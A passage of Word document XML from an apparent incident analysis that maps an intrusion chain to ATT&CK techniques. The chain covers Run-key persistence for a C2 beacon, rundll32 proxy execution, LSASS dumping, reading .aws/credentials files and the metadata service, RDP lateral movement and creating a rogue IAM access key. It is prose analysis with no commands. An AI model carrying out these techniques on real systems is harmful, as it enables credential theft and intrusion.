            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DCD9DC7" w14:textId="5AD88549" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">A new, non-obvious entry was created in the standard Windows Registry </w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Run</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> keys. The persistence mechanism ensured the </w:t>
            </w:r>
            <w:r w:rsidR="00AE4B0D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Silver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve"> C2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> beacon re-established connection automatically after system restarts or user logons, allowing the adversary to maintain long-term access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="158F6B08" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B313B1" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="050727F9" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1218.011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E95378C" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>System Binary Proxy Execution: Rundll32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D80E9A0" w14:textId="11CC6242" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">The attacker </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AE4B0D">
              <w:t>utilised</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> the legitimate, signed Microsoft binary </w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Rundll32.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(a classic </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>LOLBin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>) to load and execute the C2 payload or a credential harvesting DLL. This technique ensures the malicious execution appears in system logs as a routine Windows action, blending in with operational noise and avoiding signature-based detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="0499B914" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A09C575" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E8F225" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1003.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A9E4AB6" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>OS Credential Dumping: LSASS Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65A4F6B7" w14:textId="0FF7AB28" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Targeting the Local Security Authority Subsystem Service (LSASS) process memory was critical. This step allowed the theft of plaintext passwords, NTLM hashes, and Kerberos tickets for high-value domain users, which are essential for the subsequent Lateral Movement phase. The LSASS dump was performed using a memory utility (e.g., </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Procdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
            <w:hyperlink w:anchor="third" w:history="1">
              <w:sdt>
                <w:sdtPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                  <w:id w:val="125594972"/>
                  <w:citation/>
                </w:sdtPr>
                <w:sdtEndPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                </w:sdtEndPr>
                <w:sdtContent>
                  <w:r w:rsidR="00014265" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r w:rsidR="00014265" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> CITATION Sco20 \l 1033 </w:instrText>
                  </w:r>
                  <w:r w:rsidR="00014265" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r w:rsidR="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidR="00601437" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:noProof/>
                      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                    </w:rPr>
                    <w:t>[3]</w:t>
                  </w:r>
                  <w:r w:rsidR="00014265" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:sdtContent>
              </w:sdt>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> uploaded via the C2 channel.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="4CA7B201" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="185DEBA4" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6625AEF8" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1068</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB6495E" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation for Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42297CDB" w14:textId="2C80982E" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>A vulnerability</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (e.g., CVE-2023-XXXX) in a legacy, unpatched server application residing on the internal network was targeted to elevate the stolen user-level token to a local system or administrator token. This exploitation, combined with the credential dumping, gave the attacker effective </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve">Domain </w:t>
            </w:r>
            <w:r w:rsidR="00AE4B0D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Administrator-level</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> control required to navigate the network unhindered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="2FE0D52C" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58649F09" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="273611D5" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1526</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6056F1FE" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Cloud Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="028E8068" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>The attacker used the compromised on-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> host (a build server) to query the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>AWS Metadata Service</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and search for configuration files </w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/credentials</w:t>
            </w:r>
            <w:r>
              <w:t>) containing plaintext secrets. This was the pivotal step used to identify and map the cloud environment structure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="3D267B8E" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F5EC616" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51E22750" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1021.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C0B026C" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Remote Services: Remote Desktop Protocol (RDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D68EBAE" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Using the stolen Domain Admin credentials, the adversary moved laterally via legitimate RDP sessions to access the primary file server. This traffic is expected internally, making it highly effective for stealth and bypassing internal firewall segment enforcement points.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="6B627317" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="085ECE7B" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Cloud Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3823FAA2" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1098.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5752EA4C" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Cloud Account Manipulation: Create Access Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F35076" w14:textId="6DF2C1EF" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Using the harvested AWS credentials, the attacker created a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>new, unmonitored access key</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> for an existing, low-privilege IAM user. This established a persistent foothold directly within the AWS environment, independent of the on-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> beachhead, effectively achieving the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Cloud Pivot</w:t>
            </w:r>
            <w:hyperlink w:anchor="fourth" w:history="1">
              <w:sdt>
                <w:sdtPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                  <w:id w:val="-1705546453"/>
                  <w:citation/>
                </w:sdtPr>
                <w:sdtEndPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                </w:sdtEndPr>
                <w:sdtContent>
                  <w:r w:rsidR="006C076B" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r w:rsidR="006C076B" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> CITATION PTE25 \l 1033 </w:instrText>
                  </w:r>
                  <w:r w:rsidR="006C076B" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r w:rsidR="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidR="00601437" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:noProof/>
                      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                    </w:rPr>
                    <w:t>[4]</w:t>
                  </w:r>
                  <w:r w:rsidR="006C076B" w:rsidRPr="00601437">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:sdtContent>
              </w:sdt>
              <w:r w:rsidRPr="00601437">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="77470D89" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AE62A59" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
